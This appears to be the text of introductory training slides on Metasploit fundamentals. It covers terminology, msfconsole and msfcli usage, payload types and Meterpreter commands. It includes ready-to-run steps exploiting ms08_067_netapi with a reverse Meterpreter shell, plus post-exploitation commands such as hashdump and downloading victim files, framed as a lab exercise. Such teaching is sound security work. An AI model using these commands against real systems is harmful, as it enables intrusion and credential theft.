Metasploit Unleashed Class 1: Metasploit Fundamentals Georgia Weidman Director of Cyberwarface, Reverse Space
Acknowledgments Metasploit Team Offensive Security/Metasploit Unleashed Hackers for Charity Reverse Space
What is Metasploit Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
Installing Metasploit Use Backtrack Windows: Installer includes all dependencies http://www.metasploit.com/redmine/projects/framework/wiki/install_windows Linux: Follow documentation for dependencies http://www.metasploit.com/redmine/projects/framework/wiki/install_linux Mac: Update Ruby and install http://www.metasploit.com/redmine/projects/framework/wiki/install_macosx
Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxillary: other modules besides exploitation Session: connection from a successful exploit
An Example Traditional Pentest: Find public exploit Change offsets and return address for your target Replace shellcode Metasploit: Load Metasploit module Select target OS Set IP addresses Select payload
Interacting with Metasploit Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
Using Msfconsole: Commands help -shows help connect like netcat load/unload/loadpath load/unload modules route routes subnet traffic through a session irb drops you into a Ruby interpreter jobs show/terminate running jobs
Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit runs the selected module
Exploitation Example Search windows/smb Info windows/smb/ms08_067_netapi Use windows/smb/ms08_067_netapi Show payloads set payload=windows/meterpreter/reverse_tcp Show options Set lhost 192.168.1.3 (set other options as well) Exploit
Using Msfcli./msfcli <exploit> <option=x> X Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
Payload Types Inline - single payload with full shellcode Staged stager calls home to get more shellcode Meterpreter advanced, memory contained payload PassiveX ActiveX based, communicates via HTTP
Payload Type NoNX designed to circumvent DEP Ord staged payloads, don't require return address Ipv6 - built to function over IPv6 Reflective DLL Injection staged payload injected into memory process (ex. Meterpreter)
Generating Payloads Useful for fixing a public exploit (replacing shellcode) Select a payload (use x) generate -b <bad chars> -o <options> -t <output type> Example: use windows/shell/bind_tcp Generate -o LPORT= 4343 -t raw
Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
Meterpreter: commands help shows all available commands background backgrounds the session ps shows all processes migrate <process id> moves meterpreter to another process Getuid shows the user
Meterpreter: commands Download <file> - pulls a file from the victim Upload <file on attacker> <file on victim> - pushes a file to the victim Hashdump dumps the hashes from the sam Shell drops you in a shell
Exercises In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on your Windows XP machine. Experiment with different payloads and meterpreter commands.